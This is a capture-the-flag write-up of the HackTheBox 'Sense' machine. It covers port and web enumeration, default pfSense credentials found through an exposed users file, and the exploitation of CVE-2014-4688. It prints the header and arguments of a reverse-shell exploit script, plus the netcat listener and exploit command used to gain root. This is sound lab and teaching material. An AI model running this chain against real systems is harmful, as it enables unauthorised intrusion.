HackTheBox Write-Up — Sense
Sense highlights the importance of thorough enumeration while taking advantage of a vulnerable application running with administrative privileges.
nmap -T4 -p- 10.10.10.60
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-08 20:04 EDT
Nmap scan report for 10.10.10.60
Host is up (0.015s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open httpsNmap done: 1 IP address (1 host up) scanned in 94.63 seconds
nmap -T4 -A -p80,443 10.10.10.6
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-08 20:06 EDT
Nmap scan report for 10.10.10.60
Host is up (0.014s latency).PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open ssl/http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Login
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after: 2023-04-06T19:21:35
|_ssl-date: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), FreeBSD 8.X (85%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:freebsd:freebsd:8.1 cpe:/o:openbsd:openbsd:4.0
Aggressive OS guesses: Comau C4G robot control unit (92%), FreeBSD 8.1 (85%), OpenBSD 4.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hopsTRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 12.27 ms 10.10.14.1
2 12.33 ms 10.10.10.60OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.10 seconds
We run a Nikto scan on port 443 as we can’t find much, and port 80 appears to be a redirect.
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.60
+ Target Hostname: 10.10.10.60
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address
Ciphers: AES256-SHA
Issuer: /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address
+ Start Time: 2020-06-08 23:46:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.35
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie cookie_test created without the secure flag
+ Cookie cookie_test created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Hostname '10.10.10.60' does not match certificate's names: Common
+ Multiple index files found: /index.html, /index.php
+ OSVDB-112004: /: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /index.php: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3092: /tree/: This might be interesting...
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ /help.php: A help file was found.
+ 7500 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2020-06-08 23:55:40 (GMT-4) (538 seconds)
--------------------------------------------------------------------The Nikto scan finds this machine vulnerable to the same “Shellshock” vulnerability we found in my Write-Up on Shocker, as well as to have found a directory named “tree.” We find within this directory a possibly vulnerable application with a version number.
SilverStripe Tree Control v0.1
After not getting very far with this version number, I decided to directory brute-force port 443, then search for specific file-types as well.
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.60 -k
Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode : dir
[+] Url/Domain : https://10.10.10.60/
[+] Threads : 10
[+] Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/themes (Status: 301)
/css (Status: 301)
/includes (Status: 301)
/javascript (Status: 301)
/classes (Status: 301)
/widgets (Status: 301)
/tree (Status: 301)
/shortcuts (Status: 301)
/installer (Status: 301)
/wizards (Status: 301)
/csrf (Status: 301)
/filebrowser (Status: 301)
=====================================================gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.60 -k -x php,txt
Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode : dir
[+] Url/Domain : https://10.10.10.60/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 204,301,302,307,200
[+] Extensions : .php,.txt
=====================================================
/index.php (Status: 200)
/help.php (Status: 200)
/themes (Status: 301)
/stats.php (Status: 200)
/css (Status: 301)
/edit.php (Status: 200)
/includes (Status: 301)
/license.php (Status: 200)
/system.php (Status: 200)
/status.php (Status: 200)
/javascript (Status: 301)
/changelog.txt (Status: 200)
/classes (Status: 301)
/exec.php (Status: 200)
/widgets (Status: 301)
/graph.php (Status: 200)
/tree (Status: 301)
/wizard.php (Status: 200)
/shortcuts (Status: 301)
/pkg.php (Status: 200)
/installer (Status: 301)
/wizards (Status: 301)
/xmlrpc.php (Status: 200)
/reboot.php (Status: 200)
/interfaces.php (Status: 200)
/csrf (Status: 301)
/system-users.txt (Status: 200)
/filebrowser (Status: 301)
We appear to have credentials…
Rohit | company defaults
These credentials will not work. Company defaults? Maybe this could be the default password for the application.
By viewing the source of the application, we find that the full name is “pfsense.”
Google tells us that the default credential password is pfsense.
rohit | pfsense
The credentials above work. We find a version number upon login.
Searchsploit finds a number of exploits, but the one that catches our eye the most based on our version is “pfSense < 2.1.4 — ‘status_rrd_graph_img.php’ Command Injection.”
searchsploit pfsense
searchsploit -m 43560
This exploit appears to be a Python-3 script with the following arguments:
#!/usr/bin/env python3# Exploit Title: pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
# Date: 2018-01-12
# Exploit Author: absolomb
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/
# Version: <=2.1.3
# Tested on: FreeBSD 8.3-RELEASE-p16
# CVE : CVE-2014-4688import argparse
import requests
import urllib
import urllib3
import collections'''
pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
This script will return a reverse shell on specified listener address and port.
Ensure you have started a listener to catch the shell before running!
'''parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument('--lhost', help = 'Local Host listener')
parser.add_argument('--lport', help = 'Local Port listener')
parser.add_argument("--username", help = "pfsense Username")
parser.add_argument("--password", help = "pfsense Password")
args = parser.parse_args()rhost = args.rhost
lhost = args.lhost
lport = args.lport
username = args.username
password = args.password
We will run the following code and setup a listener on the designated port:
nc -nlvp 1234
python3 43560.py — rhost 10.10.10.60 — lhost 10.10.14.27 — lport 1234 — username rohit — password pfsense
It appears the application is already running as root. The root flag can be found at /root/root.txt, while the user flag is found at /home/rohit/user.txt!
